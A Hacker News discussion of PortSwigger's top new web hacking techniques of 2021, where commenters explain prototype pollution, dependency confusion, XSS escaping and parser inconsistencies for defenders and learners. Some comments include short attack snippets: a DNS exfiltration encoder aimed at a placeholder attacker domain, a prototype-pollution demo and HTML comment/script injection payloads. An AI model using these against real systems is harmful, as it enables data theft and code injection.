Hacker News
Web hacking techniques of 2021 (portswigger.net)
567 points by adrianomartins on Feb 10, 2022 | 50 comments



This guy's work always impresses me. He had a nice Blackhat brief as well.

This list is great and all for red-teamers, but as a defender I would like to know if any actual threat actors used these techniques, even after publication. Across all the secret/private and public threat intel I am aware of, none of them register. Not knocking threat research; I am honestly curious, because I can't tell whether I should be on the lookout for real threat actors using these techniques.


Yes, actual threat actors use these techniques even after publication. There are a lot of outdated/misconfigured systems in the wild. A fairly recent example is the defacing of multiple Ukrainian government websites[1] through exploitation of a vulnerability fixed and publicised in August 2021. There are also around 10,000 (can't remember where that statistic is from) Huawei routers on the internet vulnerable to an issue from 2015, which are constantly being infected with botnet worms.

[1] https://www.bleepingcomputer.com/news/security/multiple-ukra...


I know first-hand that web exploits happen all the time.

> all 15 compromised Ukrainian sites were using an outdated version of the October CMS, vulnerable to CVE-2021-32648.

That CVE looks like it was caused by someone using == instead of === in PHP.
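The same class of type-juggling bug exists in JavaScript's loose equality, so a sketch there shows the shape of it. This is a hypothetical reset-code check for illustration, not the actual October CMS code:

```javascript
// PHP's ==/=== pitfall has a direct analogue in JavaScript.
function checkResetCode(supplied, stored) {
  return supplied == stored; // BUG: loose comparison coerces types
}

// If a failed lookup leaves `stored` as 0, several bogus inputs pass:
console.log(checkResetCode("0", 0));   // true — "0" coerces to 0
console.log(checkResetCode("", 0));    // true — "" coerces to 0
console.log(checkResetCode(false, 0)); // true — false coerces to 0

// Strict comparison rejects them all:
console.log("0" === 0, "" === 0, false === 0); // false false false
```

In both languages the fix is the same: compare with the strict operator (or a constant-time comparison function for secrets).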

My question was whether things like request smuggling and protocol-abuse attacks have ever been seen in the wild.


The work on exploiting prototype pollution was excellent https://blog.s1r1us.ninja/research/PP

I didn’t know about the --disable-proto option in node or the Document Policy proposal for dealing with it.

Amazing that 80% of nested query parameter parsers were susceptible to prototype pollution.
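For a feel of why so many parsers were vulnerable: here's a minimal sketch of an unsanitised nested-key assignment polluting Object.prototype. The parser below is made up for illustration, not taken from any specific library:

```javascript
// Naive nested-query-parameter parser: "a[b]=c" becomes { a: { b: "c" } },
// but the keys are never checked.
function setNested(obj, path, value) {
  let cur = obj;
  for (let i = 0; i < path.length - 1; i++) {
    if (typeof cur[path[i]] !== "object" || cur[path[i]] === null) {
      cur[path[i]] = {};
    }
    cur = cur[path[i]]; // reading "__proto__" walks up to Object.prototype
  }
  cur[path[path.length - 1]] = value;
}

const params = {};
// An attacker supplies ?__proto__[polluted]=yes in the query string:
setNested(params, ["__proto__", "polluted"], "yes");

// Every plain object in the process now inherits the attacker's property:
console.log({}.polluted); // "yes"
```

Typical mitigations include rejecting `__proto__`/`constructor`/`prototype` as keys, keying maps off `Object.create(null)`, or the node `--disable-proto` flag mentioned above.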


As a web programmer, for whom the majority of this article is not only new, but difficult to comprehend, it makes me yearn to improve my web security knowledge. Any pointers?


I suggest going through cheatsheets on OWASP. Most of it is comprehensible to any web programmer. Here's one example:

https://cheatsheetseries.owasp.org/cheatsheets/PHP_Configura...


Do some of your own hacking on hackthebox.com. It is shocking what an already-experienced programmer can do with only a week of security training. It becomes clear that the typical software engineer doesn't give a single thought to security.


You can look at the disclosed reports on hackerone and get a feel for the kind of stuff that's being exploited and how it's being addressed.


Go through each line item in the article and create a proof of concept for yourself. You will learn a lot along the way too.


The dependency confusion article on Medium was a great read.


Beautifully simple! Exfiltrating data via a DNS request was a nice little trick too.
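The DNS trick works because even egress-filtered hosts usually resolve names: hex-encoding the payload into a subdomain of an attacker-controlled zone leaks it to that zone's authoritative server. A sketch of the encoding, where "attacker.example" is a placeholder rather than a real collection domain:

```javascript
// Hex-encode data into DNS labels under an attacker-controlled zone.
function exfilHostname(data, zone) {
  const hex = Buffer.from(data, "utf8").toString("hex");
  // DNS labels max out at 63 bytes, so chunk the payload.
  const labels = hex.match(/.{1,60}/g) || [];
  return [...labels, zone].join(".");
}

const host = exfilHostname("hostname=build-42", "attacker.example");
console.log(host);
// A single `require("dns").lookup(host, () => {})` would then leak the
// data to the zone's nameserver, even through firewalls that block
// outbound HTTP.
```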


It's a really good article, and apologies to the author for nitpicking, but even as a bona fide Python fanboy I had to raise my eyebrows at this statement:

> Some programming languages, like Python, come with an easy, more or less official method of installing dependencies for your projects.


I mean, have you ever used a language like Java? Python has a bad package-manager story, sure, but at least it has one; that's not actually universal, as far as I know.


Link for those who went straight to comments: https://medium.com/@alex.birsan/dependency-confusion-4a5d60f...


It's amazing that such a simple vulnerability can be leveraged in practice to gain access to so many machines at so many different organizations. Props to the researcher!
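The mechanism, reduced to a toy model: a resolver that consults both a private and a public index and simply takes the highest version will prefer an attacker's public upload. The package name, versions, and indexes below are all made up:

```javascript
// Minimal semver "greater than" for x.y.z strings (illustrative only).
const semverGt = (a, b) => {
  const [a1, a2, a3] = a.split(".").map(Number);
  const [b1, b2, b3] = b.split(".").map(Number);
  return a1 !== b1 ? a1 > b1 : a2 !== b2 ? a2 > b2 : a3 > b3;
};

const privateIndex = { "acme-internal-utils": "1.4.2" };
const publicIndex  = { "acme-internal-utils": "99.0.0" }; // attacker upload

function resolve(name) {
  const candidates = [privateIndex[name], publicIndex[name]].filter(Boolean);
  // Highest version wins — so the attacker's public package is chosen.
  return candidates.reduce((best, v) => (semverGt(v, best) ? v : best));
}

console.log(resolve("acme-internal-utils")); // "99.0.0"
```

The usual fix is to pin internal names (or a whole scope/namespace) exclusively to the private registry so the public index is never consulted for them.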


Five of the ten new techniques are langsec issues, which makes them inherently difficult to fix, yet we keep using unreasonably complex languages for protocols and keep stapling on more complexity, resulting in formally assured insecurity.


http://langsec.org/ does a spectacularly poor job of introducing langsec to the uninitiated. It appears to be a list of conferences and papers for academics, followed by http://langsec.org/bof-handout.pdf which makes unsubstantiated assertions and doesn't elaborate. I think more people would learn about langsec if the homepage contained an introduction followed by a guided tour of articles which incrementally teach the current state of the field in an organized accessible fashion.

EDIT: I found https://scribe.rip/1b92451d4764 which purports to be an "introduction followed by a tour", which links to “Security Applications of Formal Language Theory” and “The Seven Turrets of Babel: A Taxonomy of LangSec Errors and How to Expunge Them”. The second seems not very practical/applied or hands-on, and the first is quite long and academic (I haven't read it yet). It might be useful as reference material, but I'd be interested to see examples of designing/refactoring systems to be more secure based on langsec.


I was full-time infosec from 1998 until 2015, then moved into an adjacent role that is still technically infosec but is more about infrastructure/platform controls. This is the first time I recall ever seeing the term.

Based on reading the two sentence synopsis in Google results it’s largely indistinguishable from the more familiar “formal methods” or “formal verification”.


KTH has a course called Language based security ( https://www.kth.se/student/kurser/kurs/DD2525?l=en ) which indeed does come from people involved in formal methods.

Formal methods is a huge area, though; in essence it's about establishing proofs of correctness.


The paper linked in your EDIT is awesome. I'm an AppSec engineer and I had never encountered a term like "shotgun parser". What the authors describe as shotgun parsing is exactly what I've seen from reviewing validation logic across hundreds of enterprise applications. It's nice to have a name for the pattern.

The worst part of shotgun parsing and loosely defined input structure is the difficulty of remediation. I constantly receive pushback from dev teams when I ask them to use regex-based validation per field. What sounds like a simple task actually becomes extremely difficult because lots of apps populate datasets via convoluted monolithic endpoints. Dev teams would have to change the way shared services structure and output information. Those shared services are frequently maintained by other teams, and any other applications that consume the same data would also need to be modified.

In the end, it becomes a compromise where the ad-hoc parsing is tightened/modified to be "good enough". This bubblegum/duct-tape fix only further cements the ad-hoc parsing throughout the org.
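The langsec remedy is a single recognizer up front: parse the input into a vetted structure once, so downstream code never touches raw fields. A minimal sketch, with field rules invented purely for illustration:

```javascript
// One function that either yields a fully-validated, frozen object or
// throws — the opposite of validation checks scattered across handlers.
function parseTransferRequest(raw) {
  const errors = [];
  const account =
    typeof raw.account === "string" && /^[0-9]{8}$/.test(raw.account)
      ? raw.account
      : (errors.push("account"), null);
  const amount =
    Number.isInteger(raw.amount) && raw.amount > 0 && raw.amount <= 1000000
      ? raw.amount
      : (errors.push("amount"), null);
  if (errors.length) throw new Error("invalid fields: " + errors.join(", "));
  // Downstream code only ever sees this vetted shape.
  return Object.freeze({ account, amount });
}

const req = parseTransferRequest({ account: "12345678", amount: 500 });
console.log(req); // { account: '12345678', amount: 500 }
```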


It got me thinking: is client-side rendering intrinsically safer than SSR?

SQL queries with parameters are safer because data and code flow separately. Similarly, if you query the backend for data and then do textContent = response, that cannot cause XSS, right?


  >  textContent = response
Good question (that none of the replies seem to address). That is exactly what I would do if rendering 'tainted' text.

Can someone please tell us how it could be defeated?


This should be safe.


...unless it is text that the attacker shows to another user, in which case they can trick that user into performing some action (sending cryptocurrency, ...).


No, client-side rendering is not intrinsically safer than server-side rendering, provided all outputs of serialisation are parsed identically (as is the case for valid HTML trees).

The problems start when you try to manipulate serialised data, which is not safe to do in the general case. You should instead construct a proper representation of what you desire, and then serialise that, depending on the serialiser to take care of all of this sort of stuff. This approach has always been fairly popular in compiled languages and languages that like types, but dynamic languages have historically significantly preferred to manipulate strings, I suspect because they don’t have good ergonomics on the other approach, and it’s probably slower in interpreted languages—you’ll note that React felt the need to extend JavaScript to make its approach acceptable to people.

Most JavaScript stuff that supports server-side rendering now is working in this way, crafting a DOM tree and then serialising that. Svelte is a notable exception in that it takes a declarative DOM tree and essentially serialises what it can at compile time, thereby still retaining the required safety guarantees.

There are definitely downsides to strict adherence to the model of crafting a data structure and then serialising it; most significantly, you can’t start streaming a response until you’re done. The solution for this is to use an append-only data structure (or possibly one that allows you to “commit” the document up to a given point, while still allowing mutations in anything that occurs later in the document); thus serialisation can begin before you finish writing the document.

You know the old favourite about parsing HTML with regular expressions? <https://stackoverflow.com/questions/1732348/regex-match-open...> (If not, enjoy!) This is the thing people need to understand and realise in the general case: serialised data should be treated as opaque, and only interacted with after real parsing and before real serialisation.

HTTP headers aren’t strings; "Date: Tue, 15 Nov 1994 08:12:31 GMT" is a serialised HTTP header, representing the actual header that’s more like {Date, 1994-11-15T08:12:31Z}. And that latter is the form you should interact with it in.

HTML isn’t strings; "<p>Hello, world!</p>" is the serialised form of a paragraph element containing a text node with data “Hello, world!”. And that’s the form you should interact with it in.

Yes, I am presenting a strongly-opinionated position that lacks any shade of pragmatism. Yes, my website is generated with templates that manipulate serialised HTML. Eventually I’ll replace it with something more sound.

One last note: at the start I said valid HTML, because it’s not enough to just serialise an arbitrary HTML DOM tree, as you can easily craft invalid HTML DOM trees, like nesting hyperlinks. In most regards, the XML syntax of HTML (still a thing) is actually a safer target to serialise to because then you don’t even need to validate your tree to be confident it won’t get mangled by the serialise/parse round-trip.


Sorry, what do you mean by parsed identically? In CSR you can have data displayed in the front-end without it ever being parsed as HTML. You make an HTTP call to the backend, get some JSON, read the property, and do element.textContent = myData. If that were unsafe, there would be a bug in the browser, wouldn't there?


I was going to use optional start tags and tbody as my example, but on checking the spec it turns out that tr is actually valid as a direct child of table, even if the HTML syntax will prevent you from creating it by inserting a tbody around it. (XHTML 1.0 validation also confirms that tbody is genuinely optional there.) This actually undermines my “as is the case in valid HTML”—but never mind, I’ll demonstrate what the point was, and what is at least generally the case.

So let’s go with a more egregious invalidity: nested links. Which browsers do actually support, but HTML syntax doesn’t. Suppose you produce this DOM tree (server side or client side, I don’t care):

  p
  ├ #text "Look at this "
  ├ a href="https://a.example"
  │ ├ #text "link with "
  │ ├ a href="https://b.example"
  │ │ └ #text "nesting"
  │ └ #text " like so"
  └ #text "!"
(Client-side, you could generate it like this:

  let p = document.createElement("p");
  let a1 = document.createElement("a");
  let a2 = document.createElement("a");
  a1.href = "https://a.example";
  a2.href = "https://b.example";
  a2.append("nesting");
  a1.append("link with ", a2, " like so");
  p.append("Look at this ", a1, "!");
)

That serialises to this in both HTML and XML syntaxes:

  <p>Look at this <a href="https://a.example">link with <a href="https://b.example">nesting</a> like so</a>!</p>
(Client-side, `p.outerHTML`; `new XMLSerializer().serializeToString(p)` shows the XML syntax, which is the same modulo an xmlns attribute for XML reasons. Incidentally, `p.outerHTML` gives you HTML syntax for an HTML-syntax document and XML syntax for an XML-syntax document, which mostly means if you served the file with the application/xhtml+xml MIME type.)

But parse that with the HTML syntax, and the nested links break (e.g. `document.body.innerHTML = p.outerHTML`):

  p
  ├ #text "Look at this "
  ├ a href="https://a.example"
  │ ├ #text "link with "
  ├ a href="https://b.example"
  │ └ #text "nesting"
  └ #text " like so!"
And that is the steady state (meaning you can round-trip it again as much as you like and it will no longer change):

  <p>Look at this <a href="https://a.example">link with </a><a href="https://b.example">nesting</a> like so!</p>
Returning to the initial remark you’re asking about: I wrote that with more than just HTML in mind (partly why I brought HTTP into it later on, and because other formats like Markdown may be in use as well; and in the parent comment, SQL parameters had been mentioned, which is also a good example of the issue at hand). It is a general remark about stability and safety: interpolating strings raw is just dangerous, and you should parse and serialise, provided the format has been designed so that that’s a safe operation. As it happens, the typical DOM tree representation of HTML doesn’t protect you enough, so you need to work with valid HTML for it to be fully robust.

Actually, I’ve just thought of the perfect example of why valid HTML is important when you’re crafting a tree for serialisation, because it actually would introduce an injection vulnerability: comments. Contemplate this:

  document.createComment('--><script>alert("pwnd")</script><!--')

  #comment "--><script>alert("pwnd")</script><!--"

  <!-- --><script>alert("pwnd")</script><!-- -->
Or you could break scripts by injecting </script> or stylesheets by injecting </style>, given that they don’t use HTML entity escaping. I think these are the only cases where invalid HTML could actually be harmful; most places (not that there are many—optional start tags, link nesting and paragraph nesting are just about it) it’ll just shuffle the DOM slightly.

Y’know what? I’m starting to think even the tree form is rather dangerous to work in for HTML. XML syntax protects you from almost all inconsistency, but doesn’t guard against that comment attack (that’s literally the only thing it’ll miss) and loses the <noscript> element.

I’m tempted to retract my position that client-side rendering is not intrinsically safer than server-side, but so long as you have a step that validates your HTML before you serialise it, you’re still OK (and even the breakages depend on injecting arbitrary content into a comment, script tag or style tag, which are all extremely unlikely), so I retain my position, now hanging precariously from that delicate thread of the word “intrinsically”. I think there’s a gaping chasm below me. Hopefully there’s something soft to land on.


quick unrelated question: do you use a tool to draw the indent levels?


I typed it out manually in Vim using its built-in digraphs to get the box drawing characters: <C-K>vv for the vertical line, <C-K>vr for the vertical-and-right line, <C-K>ur for the up-and-right line.

See also https://news.ycombinator.com/item?id=30273299 for related discussion yesterday and one popular tool that helps with related things, if not this specific style of illustration.


if you use a template engine with sane defaults, you can achieve the same level of safety.


Any time it's possible for returned data to be interpreted by the client as markup, you could have XSS or a related attack.

Client side rendering does help but mistakes are still regularly made. Sometimes by the app dev, sometimes by the framework dev.

You could probably go to an extreme and return all of your application data as sprites.


Of course you can still do <div> + input + </div> in CSR, but you can definitely not do myelement.textContent = whateverIGot in SSR, right?


you can use a template engine that escapes all variables by default. in either case, it's just about coding defensively and being secure by default


Then why are parameterised queries safer, rather than just escaping variables? Escaping is hard, as shown in the article.


generating html safely using find and replace/regex is hard; escaping is easy. and the solution is to just not generate html using find and replace. You'll run into the exact same problem trying to write a bbcode/markdown/whatever parser using javascript
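What "escapes all variables by default" can look like, reduced to a few lines. This is a tagged-template sketch for illustration, not any real engine:

```javascript
// HTML-escape the five significant characters.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;"
  })[c]);
}

// Tagged template literal: every interpolation is escaped automatically,
// so the developer cannot forget to do it.
function html(strings, ...values) {
  return strings.reduce((out, s, i) => out + escapeHtml(values[i - 1]) + s);
}

const userInput = '<img src=x onerror=alert(1)>';
console.log(html`<p>Hello, ${userInput}!</p>`);
// <p>Hello, &lt;img src=x onerror=alert(1)&gt;!</p>
```

The safety comes from the default direction: raw output has to be requested explicitly, instead of escaping having to be remembered at every call site.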


Not super on-topic, but every time this site is linked, I never read the URL correctly. My brain immediately puts the break between the 's' and 'w'.


Same with expertsexchange.com


thanks, now i’ll never be able to read it properly again. :(


Interesting community-built list of the top 10 web hacking vulnerabilities used in 2021. If you're making a web product, you might want your team to quickly run through these.


It's not the top 10 used; it's the top 10 techniques new for 2021, and it specifically excludes older techniques.


Man, the JSON inconsistency one is creative. I knew implementations aren't consistent across languages, but I didn't know that could be used for attacks like these.


Yes. The big take-away for me, whether it's JSON or YAML or XML or whatever: never parse anything more than once (and definitely not with different parsers).
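A concrete instance of the hazard, runnable in node. Which layer "wins" varies by parser, and the role names below are invented:

```javascript
// Duplicate keys are one place JSON parsers disagree: JavaScript's
// JSON.parse keeps the LAST value, while some other parsers keep the
// first or reject the document outright.
const doc = '{"role": "guest", "role": "admin"}';
console.log(JSON.parse(doc).role); // "admin"

// A first-key-wins security gateway authorises this request as "guest",
// while a last-key-wins backend acts on "admin": two layers now disagree
// about the same bytes, which is the root of these inconsistency attacks.
```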


Anyone here that works on these kind of deep-dive type of security research? Can you give a TLDR of how do you usually set everything up to find these results?

As in, do you set up some sort of test environment/website with full debug logs and take it one step at a time from there? If so, how do you ensure that it is realistic and relevant to real-world use, since real-world architecture might differ from a setup that worked in your experiments?

I ask this because I used to do some bug bounties and it consisted of a lot of painful trial and error. I can't imagine anything new and profound can be found that way.

(PS in case it isn't obvious I didn't open up the research links and read in detail, hence a tldr)


I am a security researcher referenced in the winning web-hacking technique on that list ("Dependency Confusion" by Alex Birsan [1]) and was ranked 7th in Portswigger's 2019 issue [2,3]. My motto has always been "Learn to make it; then break it." In other words, I invest a lot of time familiarising myself with technologies and specifications before examining how their implementation might lead to security flaws. This process usually requires reading a lot of technical documentation and source code, and becoming acquainted with how organisations implement said technologies.

Once I feel comfortable with my understanding of the subject material, I start to think about how certain aspects of the technology could lead to security flaws or interesting areas of research. At times this may require out-of-the-box thinking or can even be the result of pure luck.

The "bug bounty" aspect of this all tends to come into play once I want to find case studies for my research.

[1]: https://medium.com/@alex.birsan/dependency-confusion-4a5d60f...

[2]: https://portswigger.net/research/top-10-web-hacking-techniqu...

[3]: https://edoverflow.com/2019/ci-knew-there-would-be-bugs-here...


Kind of feels a little repetitive to have request smuggling on the list three different times.


It baffles me how convoluted and complex the webapp attacks have become over the past few years.

I think this is an effect of bug-bounty hunting, which has pretty much opened the research on those topics to a massive community.


What about GWT (Google Web Toolkit)? It's not updated much and rarely makes top news these days, but the idea is to implement both frontend and backend in a proven language, Java.


The HN title needs updating, as it's misleading even though it reflects the title on the website. The first sentence even clarifies that it's only new techniques.

"Welcome to the Top 10 (new) Web Hacking Techniques of 2021, the latest iteration of our annual community-powered effort to identify the most significant web security research released in the last year".

The top web hacking techniques used and the top new ones I would expect to be very different lists.


I'm not an expert here, but truly interested to hear responses to this question.

To say that 1+1=2 is "true", does that not require a corollary in "reality" to something fundamental that can be called a "one" object? I believe this is called mathematical constructivism.

Imagine, hypothetically, that we cannot identify something that is physically fundamental and individual. My question is whether any mathematics in that scenario could be considered "true" without such constructivism, in other words, without a physical correspondence to an unquestionably, physically fundamental "one" object.


Sir, this is a Wendy’s



